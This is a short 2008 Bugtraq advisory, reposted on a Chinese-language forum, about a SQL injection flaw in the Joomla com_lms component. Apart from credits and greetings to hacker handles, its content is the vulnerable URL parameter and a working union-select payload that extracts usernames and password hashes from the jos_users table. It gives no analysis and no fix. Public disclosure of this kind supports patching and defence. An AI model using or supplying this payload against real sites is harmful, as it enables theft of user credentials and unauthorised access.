Joomla Component com_lms SQL Injection

看板Bugtraq作者時間18年前 (2008/04/03 23:07), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
Aria-Security Team (Persian Security Network) http://aria-security.net ---------------------------------- Joomla Component com_lms SQL Injection Greetz: AurA, Mormoroth, Null, t3rr0r1st Discovered by The-0utl4w Vendor: joomlashowroom.com/ Original Advisory: http://forum.aria-security.com/showthread.php?p=61 Vuln: index.phpoption=com_lms&task=showTests&cat=somenumber Example: -1 union select 1,concat(username,char(32),password),3,4,5,6,7 from jos_users/*
文章代碼(AID): #17zFAU00 (Bugtraq)